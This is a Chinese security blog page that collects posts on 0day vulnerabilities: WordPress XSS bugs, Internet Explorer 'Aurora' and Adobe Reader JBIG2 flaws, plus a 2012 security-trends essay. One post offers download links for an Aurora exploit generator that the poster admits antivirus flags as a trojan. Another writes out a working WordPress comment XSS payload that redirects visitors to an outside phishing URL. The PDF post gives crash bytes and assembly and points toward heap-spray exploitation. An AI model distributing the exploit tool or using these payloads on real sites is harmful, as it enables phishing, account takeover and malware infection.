WordPress发布紧急安全更新4.2.1 解决0day漏洞

根据外媒报道,流行博客程序WordPress4.2存在Oday漏洞,该漏洞可导致攻击者使用跨站攻击,从而控制网站。此漏洞被报告2个小时后,官方紧急发布了4.2.1安全更新,补上了此漏洞。

根据安全公司的报告,此次发现的漏洞一共有2个,为XSS跨站攻击漏洞。漏洞允许攻击者将代码插入到网站的 HTML内容。通过将恶意代码嵌入到博客的底部或文章后默认显示评论的部分,攻击者可以更改密码、 添加新管理员,执行任何其他管理员能执行的操作。安全公司公布了攻击演示代码和视频。

2012年互联网信息安全攻击事件研究热点分析

2011年的互联网信息安全攻击事件,除了常见的针对操作系统的漏洞攻击,针对金融机构的钓鱼网站攻击之外、还包括以日本索尼千万级用户和国内CSDN超过600万用户密码泄露为代表的针对互联网用户的安全事件。这些安全事件的发生,其本质也离不开对各种安全漏洞或者是0day漏洞的依赖,这也为安全漏洞的挖掘分析提供了参考。2012年,以基础设施的漏洞安全、云安全、社交网络的信息泄露、移动智能终端的安全以及APT高持续性攻击为代表的关键词汇,将成为信息安全领域的研究热点。

  1、 基础设施安全漏洞

  此类以微软和苹果为代表,涉及到操作系统、浏览器类等。这一部分基础设施类的应用程序研究重点有三大部分:

  1)以微软为代表的操作系统类的产品安全漏洞:2011年微软共发布了接近100个安全补丁,修复的包括操作系统内核、Office系列办 Continue reading "2012年互联网信息安全攻击事件研究热点分析"

IE Dom 0day(极光)漏洞生成器 修正版 下载

pop:经过我的测试,发现还是不错的,可惜一生成出来的我的NOD32就提示特洛伊木马了。

文件: IE Dom 0day 生成器 修正版.exe
大小: 695846 字节
MD5: C5EEC0F31D9F9CC480896BAFD6F1FCAA
SHA1: F0D90FB72D4CB610BEE87994703BA585DC9D69C1
CRC32: 650F043D

截图:

警告:本程序只供测试使用,非法使用者后果自负。

IE Dom 0day 生成器 修正版 生成器 下载地址:
http://d.namipan.com/d/c89c25eb5dcc9c58fd34557f53faa55867b17b4a6e060a00
http://www.rayfile.com/files/ee37c561-0a1c-11df-8676-0015c55db73d/

其他类型的生成器:
http://www.kukafei520.net/blog/download.asp?id=126
http://www.feihack.com/download.asp?id=77

IE Dom 0day(极光)漏洞 测试页面:
http://www.maxthon.cn/test/security.htm

页面为测试IE漏洞页面,并不会对您的计算机造成危害。

点击开始测试后,如果出现如下现象(本机计算器程序启动或浏览器崩溃),说明您的浏览器会因此漏洞受到木马病毒的攻击,造成您的网游,银行卡等账号被盗丢失。
请立即下载傲游浏览器以免受攻击。

相关文章:
http://blog.duba.net/post/ie-dom-0day-gongkaichuanbo.html
http://hi.baidu.com/r4bb17/blog/item/4f63b4217227fa599922edc2.html
http://www.feihack.com/default.asp?id=154

WordPress 2.8 Xss 0DAY 漏洞

pop:今天别人在群里面发出来的,简单的翻译了一下,类似是跨站的漏洞,鬼仔那里也有分析了,地址附在最后。

It had been published that wordpress 2.8 All version are suffering from Xss,attackers can use this to do fishing,they make a wordpress login page as it is your own.If you don’t take care,your password will be sent to the attacker’s website.With your password,they can edit pages and upload webshell.It is harmful.

How is the attacker do this?(如何进行入侵?)
they insert website url like this(in the comments write place):

http://www.vul.kr’ onmousemove=’location.href=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,118,117,108,46,107,114,47,63,112,61,53,54,57);

If someone(or administrator) moved his mouse on the author’s website.It will jump to another URL,which is a fishing page.

How can we patch it?(如何打上补丁?)

Edit wp-comments-post.php
go line 40 and then add:
$comment_author_url = str_replace(chr(39),”,$comment_author_url);
$comment_author_url = str_replace(chr(59),”,$comment_author_url);
$comment_author_url = str_replace(chr(44),”,$comment_author_url);

最后是提示管理员的:
Webmasters,please patch it as soon as you can.

WordPress 2.8.1 评论显示xss漏洞
http://huaidan.org/archives/3228.html

Be Careful,Wordpress 2.8 All Version Xss 0DAY
http://www.vul.kr/?p=569

最新pdf 0day漏洞

来源:alert7

下面这个是老的。
http://insecureweb.com/%20/newish-web-based-pdf-attack-in-the-wild-with-real-exploit-code/

新的pdf 0day 在这里
http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html

Maybe you read Michael Howard's twitter feed. If so, you may be wondering why you were asked to turn off Javascript in Adobe Acrobat Reader. Well, I'm here to tell you that if you were to load a PDF file with an embedded JBIG2 image stream:

<< /Type /XObject /Subtype /Image /Width 2550 /Height 3305 /BitsPerComponent 1
/ColorSpace /DeviceGray /Filter /JBIG2Decode/DecodeParms << /jbig2Globals 13 0 R >> /Length 10 0 R /Name /X >>
stream
And the 5th byte into the stream (which is the segment header flag byte) were to have the 6th bit set indicating a large page association size:

00 00 00 01 40 00 00 33 33 33
Then the bytes shown as 00 33 33 33 above would be loaded by the following assembly in AcroRd32.dll (ecx+0x1c points to our four bytes):

5d42d889 8b411c mov eax,dword ptr [ecx+1Ch]
5d42d88c 85c0 test eax,eax
5d42d88e 0f84ac020000 je AcroRd32_5cd80000!PDFLTerm+0x235ad0 (5d42db40)
5d42d894 8b4e10 mov ecx,dword ptr [esi+10h]
5d42d897 8d0480 lea eax,[eax+eax*4]
5d42d89a 834481ec01 add dword ptr [ecx+eax*4-14h],1 ds:0023:07d96648=????????
eax=00ffffff
ecx=03d96660
Playing with much smaller (0x9000) or much larger would result in crashes in different areas, but in general you would control within multiples of four where you write. If you were to add to this a quick heap spray with some javascript, I don't doubt that you could write a rather reliable exploit across multiple versions of Acrobat Reader for XP, and if one were really inclined (or bored), for linux or OS X also! Yes, it crashes on all three, in versions 8 and 9. So to all of you security pros who were looking forward to a nice quiet weekend, I can't fix it, but hopefully this will make the fire drill a little less long and arduous. Have a good one!

Oh, by the way, I forgot to mention. If you happen to open an explorer window, or a browser window, or anything at all that even has the ICON of the pdf file, you're owned.

Open Source Snort rules and SEU 203 will be up in a few with coverage. The clam sig is called Exploit.PDF-23

P.S. To adobe: Matt Olney would like to know why javascript is on by default. Thanks.